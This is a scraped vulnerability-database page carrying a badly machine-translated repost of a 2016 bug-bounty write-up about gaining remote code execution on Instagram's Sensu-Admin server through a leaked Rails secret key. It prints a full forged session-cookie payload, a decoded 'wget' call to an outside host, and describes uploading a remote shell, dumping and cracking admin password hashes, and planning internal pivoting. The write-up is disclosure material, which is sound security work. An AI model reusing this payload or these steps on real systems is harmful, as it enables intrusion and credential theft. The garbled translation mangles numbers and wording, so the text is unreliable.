Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62201673626
HistoryApr 14, 2016 - 12:00 a.m.

From the deserialization vulnerability to take control of the Empire: millions of dollars of Instagram vulnerability-vulnerability warning-the black bar safety net

2016-04-1400:00:00
佚名
www.myhack58.com
14
JSON

2 0 1 2 years, Blloberg in the Facebook white hat reward program’s website published a famous article, mentioned in the article:“if Facebook shows the value of millions of dollars of vulnerability,we also wishes to do a single full pay”in. In this article before you start, I want to cheat click article title to share with you an apology, but Facebook put before the house a statement I wrote this article for important background. After some attempts and efforts, I did find one out of a million dollars in the Instagram vulnerability can be used to obtain Instagram source code, photos and SSL certificates, etc.
0x01 great clues
Last year, I worked on the Facebook security been some small tests, but also achieved some results, so I for in-depth testing of Facebook’s overall traffic safety has a very strong interest. The discovery of this vulnerability actually would also like to thank my company to allow me to during non-working hours to find other company of the vulnerability, or else simply not this article. The thing is, a friend of mine some time ago and I mentioned that they are testing as the Facebook vulnerability reward Program an important component of the Ins system security. They found that Instagram exists a vulnerability in the Ruby Server(https://sensu.instagram.com), my friend told me that this vulnerability has been he submitted to the Facebook vulnerability response team, the vulnerability classification is the“internal admin external”in. In His to Facebook in the submission of the report referred to in the background there may be a Ruby password reset vulnerability which can be exploited by hackers to log into the backend, but he did not confirm his guess. See the vulnerability details of the first eye, I remembered the CVE-2 0 1 3-3 2 2 1 at http://ronin-ruby.github.io/blog/2013/01/28/new-rails-poc.html but given that he has already submitted this bug, so my friend just privately let me help him look at are not able to in-depth use of this trail, to expand the vulnerability, contact Instagram of core data.
0x02 Ruby(Rails)remote command execution
Based on the before friends of the vulnerability report detail, I try to find the can reset this the Ruby application password vulnerability. However, preliminary test results is not ideal, usually the login page does not accept value“0”as a password, and I also don’t know to use what way to send a password reset email. I found that Instagram of this background may be used in the open source Sensu management system, so I Google the keyword“Sensu-Admin”, but nothing. Look, looks like my friend’s speculation is not.
But the surprise is that I found this application on Github with the source code in the project directory, I found a secret_token. rb leak the Rails of the private key. My first reaction was that Facebook programmers are not stupid enough to put in to build your own backend application the time does not change the private key? But I still want to try, because if the attempt is successful, then I can forge seesion cookies, and then log in the background. As I also mentioned in the CVE-2 0 1 3-3 2 2 1 at http://ronin-ruby.github.io/blog/2013/01/28/new-rails-poc.html that the author of this article pointed out, not only cookies can be forged, and because of Ruby of Rails deserialization vulnerability, an attacker can even directly construct a remote code execution attack.
In the attempt to deserialize vulnerability testing to Instagram this business before, I’m first in the local test, I use the following test frame: https://github.com/charliesome/charlie.bz/blob/master/posts/rails-3.2.10-remote-code-execution.md
The results surprisingly good, I managed in the local reproduction of the vulnerability. So, I use the same steps, combined with just-in Github and found that I to Instagram of Sensu-Admin management back-end server sends the following cookies:
#! bash
_sensu-admin_session=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByzwnhdglvbjo6rgvwcmvjyxrlzeluc3rhbmnlvmfyawfibgvqcm94eqc6dkbpbnn0yw5jzw86cevsqgy6cubzcmnjikfldmfskcdzexn0zw0oindnzxqgahr0cdovl2v4zmlsdhjhdgvklmnvbs90zxn0lwluc3rhz3jhbsipjykgogzfvdomqg1ldghvzdolcmvzdwx0–92c614a28526d03a1a31576bf4bb4c6026ef5e1f
Through a carefully constructed cookie, Instagram the server successful execution of the Send me the code, decrypt to Is this:
“wget http://exfiltrated.com/test-instagram
So, I set up a listening port, and then upload a remote shell file, the results are as follows:
! [](/Article/UploadPic/2016-4/2 0 1 6 4 1 4 1 7 2 4 1 3 5 0 6. png)
To successfully get Instagram server to perform me the command to send the code after I put the bug report to the Facebook team. In my report I mentioned:
Facebook use the“Sensu-Admin”Service use on the network disclosure of the private key
sensu. instagram. com is running with Rails 3. X version, this version there is a remote code execution vulnerability.
0x03 deadly weak passwords
In fact, for me, found a remote code execution that is not what the big deal is the exciting thing. But I want to confirm whether I also in the Facebook vulnerability reward program of the range, so I went and viewed the Facebook of the vulnerability reward program instructions, the instructions mentioned, although Facebook argued against in the test may have on the business carried out the destruction of the penetration behavior, but the response team, if the tester explicitly yourself can be exposed to more core data is very interesting. Well, see here, I think my own penetration testing behavior also in the Facebook license range.
The previous Chapter mentioned that, although I successfully make Facebook the server to execute remote code, access to server Shell, but I did not come into contact with the background of the UI interface. As it happens, Instagram this background the management of user data stored in the same server as the Postgres DB, if so, hand from the knife fall, I managed to get the background about 6 0 account Username and password. However, very miserable is, the password is encrypted, I’m sick to my stomach. how to decrypt the data anyway, the good news came. I a short period of time to crack out a 1 2 a weak password, these passwords include"changme",“password”,"instagram"is. My day! The red fruit of a weak password. So, I successfully logged in https://sensu. instagram. com backend interface, a screenshot taken: the
! [](/Article/UploadPic/2016-4/2 0 1 6 4 1 4 1 7 2 4 1 3 9 9 5. png)
Because Facebook strongly opposed in the test may have on the business carried out the destruction of the permeation behavior, so I just screenshot a picture and leave, easily put this as a new vulnerability was submitted to the Facebook Emergency Response Team.
0x04 penetration within the network
In my first bug report mail, I asked the Facebook team is able to get penetration within the network of authorized. Because the Sensu-Admin Server is running in EC2 above, in the etc/host/folder you can see the large and small 1 4 0 0 a system of records. So this also means that I have a very large may be able to hack into Instagram within the network.

[1] [2] [3] [4] next

JSON